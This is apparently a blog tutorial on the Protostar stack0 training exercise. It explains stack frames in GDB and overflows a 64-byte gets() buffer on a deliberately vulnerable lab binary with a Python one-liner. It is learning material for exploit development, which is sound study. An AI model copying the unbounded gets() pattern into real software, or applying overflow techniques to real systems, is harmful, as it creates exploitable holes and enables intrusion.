
Protostar Stack0 walkthrough
Hello there, In this tutorial we are going to learn Linux exploit development. We use protostar Linux mashing for this purpose. Protostar was developed by exploit-exercises.com. Unfortunately, The host site is now down. Anyway, you can download the iso file from the internet. Just google it. So first Download it and use a virtual box or Vmware as the virtualization software.
Introducing to Protostar
As the first step boot protostar and log in as root. Default username/password s are "root:godmode". After log in as root use ifconfig to get the IP of the mashing.
Now you can use SSH in Linux or putty to access our victim mashing. This time you have to log in as the normal user. Default credentials are "user:user".
There is one more thing to do before you actually start the learning process. Just change your shell to bash by entering bash. Because with bash shell you have more power than the sh shell.
Now the interesting part is beginning. All of the challenges are located inside "/opt/protostar/bin".
So use cd && ls
cd /opt/protostar/bin && ls
There are 25 levels to play which can be divided into the following main categories.
- Stack-based buffer overflows
- Heap-based buffer overflows
- Format string Exploits
The easiest part to understand is stack-based exploits. Even if you are new to exploit development you can understand what's going on. The first level you want to try is stack0. It'll teach you how function calls happen?. How stack frames are built and how to over flaw data outside of allocated buffer etc.
Take a look at stack0 binary
lets see what we have to do.
./stack0
just enter a string and see what happens.
It's said to retry. :-(
[email protected]:/opt/protostar/bin$ ./stack0
hello
Try again?
We have given the source code also. But actually it doesn't help a lot. Just try to get an idea of what happening.
#include
#include
#include
int main(int argc,char **argv){
volatile int modified;
char buffer[64];
modified=0;
gets(buffer);
if(modified!=0){
printf("you have changed the 'modified' variable\n");
}
else
{
printf("Try again?\n");
}
}
First, it declares two variables called 'modified' and 'buffer'. The size of the buffer is 64 bytes. After it takes a string as the input from the user and copies that to buffer space. This code doesn't any kind of bound checking before copy data into buffer space. It doesn't care if the supplied string is lager than buffer space. Buffer overflows occur in such a situation.
Did you note something special when declaring the 'modified' integer value.? why there is a volatile keyword? First, we give value zero to our 'modified' value. But in this code, it's never changed and after that, there is an if-statement for check if int variable is equal to zero or not. What a joke hear. :-). When the compiler sees this, it doesn't care about if-statement and optimize the code. That's why the 'volatile' keyword is used in the above code. It says compiler, 'Hay GCC Don't bother about the integer value. It may change when run time :-)'
Disassembling the binary
Now the time to disassemble the binary and see the inner working of it. We use GDB for this. Let me introduce you to our awesome tool GDB. It's an acronym for GNU debugger. By using a debugger we can see how things are happening inside the mashing code. In the following screenshot, you can see I have used Intel syntax for assembly.
set disassembly-flavor intel
The reason to use Intel's Assembly syntax is it's clean, user friendly, and easy to understand.
As the next step, I disassembled the main function.
(gdb) disass main
Dump of assembler code for function main:
0x080483f4 <main+0>: push ebp
0x080483f5 <main+1>: mov ebp,esp
0x080483f7 <main+3>: and esp,0xfffffff0
0x080483fa <main+6>: sub esp,0x60
0x080483fd <main+9>: mov DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>: lea eax,[esp+0x1c]
0x08048409 <main+21>: mov DWORD PTR [esp],eax
0x0804840c <main+24>: call 0x804830c <[email protected]>
0x08048411 <main+29>: mov eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>: test eax,eax
0x08048417 <main+35>: je 0x8048427 <main+51>
0x08048419 <main+37>: mov DWORD PTR [esp],0x8048500
0x08048420 <main+44>: call 0x804832c <[email protected]>
0x08048425 <main+49>: jmp 0x8048433 <main+63>
0x08048427 <main+51>: mov DWORD PTR [esp],0x8048529
0x0804842e <main+58>: call 0x804832c <[email protected]>
0x08048433 <main+63>: leave
0x08048434 <main+64>: ret
End of assembler dump.
There are some Hexadecimal values in the left-hand side. Those are called memory addresses. Our assembly instructions are stored at these locations. The computer memory is divided into some small parts called bytes. You know that one byte is equal to 8 bits. 1 bit can hold zero or one. So in binary 8 bits can hold 256 values. Their range is 0 to 256 in decimal. Normally we work with 4-byte words.
In CPU there are 5 main components for process instructions.
- Data bus
- Instruction Decoder
- Program counter
- Arithmetic and logic unit (ALU)
- Registers
The program counter keeps track of what instruction should be processed this time and what's next to get executed. Actually this is happened with EIP register. EIP register always holds the memory address of the instruction. Now CPU knows the memory address of the instruction . So it takes the instruction and give whatever found on that address to the Instruction Decoder. The instruction those fetched from memory is something called op-codes. They have their own meaning. The Op-Code for pop EDI is 5f while Op-Code for inc ebp is 45. Duty of Instruction Decoder is to find out what to do from these op-codes. If it sees op-code 5f it says CPU 'pop off the stack and save the value of the ESP in EDI' . As the final step needed data come through the data bus and processed in ALU. After that processed data is saved in memory or registers. OK, I hope you understood what's going on here.
Actually instructions like push ebp / mov ebp, esp are not coming from main function. They are included by the compiler to make a stack frame for the function. Let me quickly introduce you to the term stack.
The stack is a concept used in Computer science. In programs, we have to use functions to make things easy and clear. In languages like C and python, you can see that we supply some arguments to function and functions return some data too. So how this is possible? .This is the place Stack comes to play. We use the stack to give function arguments. The stack is always beginning from high memory and grows in to low memory. We can add something to stack by using push command and remove with pop command. The ESP register always points to the top of the stack.
In the following code snipet you can see, I have created a breakpoint inside of the main function. For that, I used break *0x80483f4. You may ask me 'Why you didn't use break main?'. Well if we use break main the debugger skips function prologue and only cares about the main function's code because it knows the prologue code is coming from the compiler. Since we want to see how is stack build, we set the breakpoint like this.
(gdb) b *0x080483f4
Breakpoint 1 at 0x80483f4: file stack0/stack0.c, line 6.
(gdb) run
Starting program: /opt/protostar/bin/stack0
Breakpoint 1, main (argc=1, argv=0xbffff864) at stack0/stack0.c:6
Next, we use the command i r to see what's inside of registers. Actually this short form of info registers.
(gdb) i r
eax 0xbffff864 -1073743772
ecx 0x9b28c042 -1691828158
edx 0x1 1
ebx 0xb7fd7ff4 -1208123404
esp 0xbffff7bc 0xbffff7bc
ebp 0xbffff838 0xbffff838
esi 0x0 0
edi 0x0 0
eip 0x80483f4 0x80483f4
Note that EIP is pointing to an address 0x80483f4. Do you remember it? It was the address of the first instruction of the above-disassembled code.EIP contains that value because the next instruction waiting to execute is there.
we have stopped execution at the start of the code. Following is the graphical view of the stack. You can see right now there is something on the top of the stack called ret. So what's it. That is the return address and after completing our function's process CPU has to go to that address and execute whatever instruction found there.
We can examine stack also in GDB. Let's see how. Command for examine memory in hexadecimal is below.
Get ready to the extraction
What if I want to examine multiple words that begin from an address? We can do it this way.
(gdb) x/30x $esp
0xbffff7bc: 0xb7eadc76 0x00000001 0xbffff864 0xbffff86c
0xbffff7cc: 0xb7fe1848 0xbffff820 0xffffffff 0xb7ffeff4
0xbffff7dc: 0x0804824b 0x00000001 0xbffff820 0xb7ff0626
0xbffff7ec: 0xb7fffab0 0xb7fe1b28 0xb7fd7ff4 0x00000000
0xbffff7fc: 0x00000000 0xbffff838 0xb17f3652 0x9b28c042
0xbffff80c: 0x00000000 0x00000000 0x00000000 0x00000001
0xbffff81c: 0x08048340 0x00000000 0xb7ff6210 0xb7eadb9b
0xbffff82c: 0xb7ffeff4 0x00000001
In the above image, you can see the return address within a green box at top of the esp. Remember that top of the stack in low memory addresses.
The next instruction is push ebp. So theoretically the value of EBP register should be copied to the top of the stack after this instruction. Let's see if this true or not?
(gdb) ni
0x080483f5 6 in stack0/stack0.c
(gdb) x/30x $esp
0xbffff7b8: 0xbffff838 0xb7eadc76 0x00000001 0xbffff864
0xbffff7c8: 0xbffff86c 0xb7fe1848 0xbffff820 0xffffffff
0xbffff7d8: 0xb7ffeff4 0x0804824b 0x00000001 0xbffff820
0xbffff7e8: 0xb7ff0626 0xb7fffab0 0xb7fe1b28 0xb7fd7ff4
0xbffff7f8: 0x00000000 0x00000000 0xbffff838 0xb17f3652
0xbffff808: 0x9b28c042 0x00000000 0x00000000 0x00000000
0xbffff818: 0x00000001 0x08048340 0x00000000 0xb7ff6210
0xbffff828: 0xb7eadb9b 0xb7ffeff4
You can see that in a blue box there is a value copied to stack and it's 0xbfff838. This is nothing but the value of EBP. :-). Another thing happens. Esp changed from 0xbffff7bc to 0xbffff7b8. Calculate the difference between them using your calculator in mind. It will be at 4. Yes, the size of a register is 4 bytes. So ESP got reduced by 4 bytes. Wait why ESP reduced while we push data to stack?. This is because the stack is growing to low memory. If something is pushed to stack ESP is reduced. If we pop off the stack ESP goes high. Anyway, right now stack looks like this.
The next instruction to execute is mov ebp , esp. So the value of ESP should be copied to EBP. Now both ESP and ESP registers point to the top of stack like this.
Let's see this situation in GDB.
(gdb) i r esp ebp
esp 0xbffff7b8 0xbffff7b8
ebp 0xbffff838 0xbffff838
(gdb) ni
0x080483f7 6 in stack0/stack0.c
(gdb) i r esp ebp
esp 0xbffff7b8 0xbffff7b8
ebp 0xbffff7b8 0xbffff7b8
I have used another GDB command called ni hear. It is similar to the ' next instruction'. The name says all. It simply executes the next instruction. Also in the above screenshot, you can see that ESP has never changed. We have never push or pop things to stack. So ESP stays on its current location.
Next, there is a code as and esp, 0xfffffff0. This command is used to align the stack and we don't want to care much about this. However, ESP is changed like this. (Goes to a low address)
As the next instruction, there is a sub esp, 0x60 So ESP is reduced by 96 bytes. Where is 96 coming from? 60 in Hex is 96 in decimal. This is how to allocate space for local variables in the stack.
We can see this on GDB too.
(gdb) i r esp
esp 0xbffff7b0 0xbffff7b0
(gdb) ni
10 in stack0/stack0.c
(gdb) i r esp
esp 0xbffff750 0xbffff750
0xbffff7b0 - 0xbffff750 = 0x60 ==> 96 Bytes in decimal .
OK. Let's see what's up to next?.
mov DWRD PTR [esp + 0x5c] , 0x0
This code gets the address pointed by esp + 0x5c and copies a zero value to it. Since 0x5c is equal to 92 in decimal zero is copied to 4 bytes ahead of saved EBP.
Can you imagine what this line of code actually does? In our C source code, there was an int value that equal to zero. This is that value. :-)
(gdb) x/30x $esp
0xbffff750: 0x00000000 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffff760: 0xb7fd7ff4 0xb7ec6165 0xbffff778 0xb7eada75
0xbffff770: 0xb7fd7ff4 0x08049620 0xbffff788 0x080482e8
0xbffff780: 0xb7ff1040 0x08049620 0xbffff7b8 0x08048469
0xbffff790: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffff7b8
0xbffff7a0: 0xb7ec6365 0xb7ff1040 0x0804845b 0xb7fd7ff4
0xbffff7b0: 0x08048450 0x00000000 0xbffff838 0xb7eadc76
0xbffff7c0: 0x00000001 0xbffff864
(gdb) x/i $eip
0x80483fd <main+9>: mov DWORD PTR [esp+0x5c],0x0
(gdb) ni
11 in stack0/stack0.c
(gdb) x/30x $esp
0xbffff750: 0x00000000 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffff760: 0xb7fd7ff4 0xb7ec6165 0xbffff778 0xb7eada75
0xbffff770: 0xb7fd7ff4 0x08049620 0xbffff788 0x080482e8
0xbffff780: 0xb7ff1040 0x08049620 0xbffff7b8 0x08048469
0xbffff790: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffff7b8
0xbffff7a0: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0xbffff7b0: 0x08048450 0x00000000 0xbffff838 0xb7eadc76
0xbffff7c0: 0x00000001 0xbffff864
Next instruction is.
lea eax , [esp + 0x1c]
lea stands for Load Effective Address.This will load the address pointed by esp + 0x1c = esp + 28
(gdb) i r eax
eax 0xbffff864 -1073743772
(gdb) x/i $eip
0x8048405 <main+17>: lea eax,[esp+0x1c]
(gdb) ni
0x08048409 11 in stack0/stack0.c
(gdb) i r eax
eax 0xbffff76c -1073744020
After that, whatever in the EAX is pushed to the stack. What both of the above instructions did together? They load an address to the stack. But why? .This is the argument for the next function. the next thing to do is call to GETS function. The argument to that function was pushed to the stack. After calling to GETS function it writes data into that memory address.
Let's see what happens when the GETS function writes input data to the buffer on the stack. Now I enter some A s as the string to function.
You can clearly see that our input is copied on the stack.
(gdb) x/30x $esp
0xbffff750: 0xbffff76c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffff760: 0xb7fd7ff4 0xb7ec6165 0xbffff778 0xb7eada75
0xbffff770: 0xb7fd7ff4 0x08049620 0xbffff788 0x080482e8
0xbffff780: 0xb7ff1040 0x08049620 0xbffff7b8 0x08048469
0xbffff790: 0xb7fd8304 0xb7fd7ff4 0x08048450 0xbffff7b8
0xbffff7a0: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0xbffff7b0: 0x08048450 0x00000000 0xbffff838 0xb7eadc76
0xbffff7c0: 0x00000001 0xbffff864
(gdb) x/i $eip
0x804840c <main+24>: call 0x804830c <[email protected]>
(gdb) ni
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
13 in stack0/stack0.c
(gdb) x/30x $esp
0xbffff750: 0xbffff76c 0x00000001 0xb7fff8f8 0xb7f0186e
0xbffff760: 0xb7fd7ff4 0xb7ec6165 0xbffff778 0x41414141
0xbffff770: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff780: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff790: 0x41414141 0x41414141 0x08004141 0xbffff7b8
0xbffff7a0: 0xb7ec6365 0xb7ff1040 0x0804845b 0x00000000
0xbffff7b0: 0x08048450 0x00000000 0xbffff838 0xb7eadc76
0xbffff7c0: 0x00000001 0xbffff864
What if I enter more large number of As? It will overflow into our previous value (modified integer). How much data is needed to overflow into integer value? Since our buffer is 64 bytes If I enter 65 As It will get modified.
Now all clear and OK. It's time for extraction. We can use the lovely <3 Python for this.
If I enter python -c "print '\x41' * 65 " in a shell I can get 65 As printed. So I can pipe this command's output as the input of stack0 program like this.
[email protected]:/opt/protostar/bin$ python -c "print '\x41'*65" | ./stack0
you have changed the 'modified' variable
Awesome. we did it. We successfully modified the value. It was not just one command. we learned all the theories.
Now there is one more thing. What if I enter a more large input?
We will get a segmentation fault. Real happiness begins with this part. We are going to learn more about this topic in future tutorials.
See you again soon. Thank you for reading.
When it comes to search engine optimization, URL structure plays an important role. If the URL....
Today another tutorial on PHP programming. In this one I'm going to explain how we can fetch HTTP....
Accordion to GDPR (General Data Protection Regulation) If we collect or save any kind of website....

Thilan Dissanayaka
Hi, I'm Thilan from Srilanka. An undergraduate Engineering student of University of Ruhuna. I love to explorer things about CS, Hacking, Reverse engineering etc.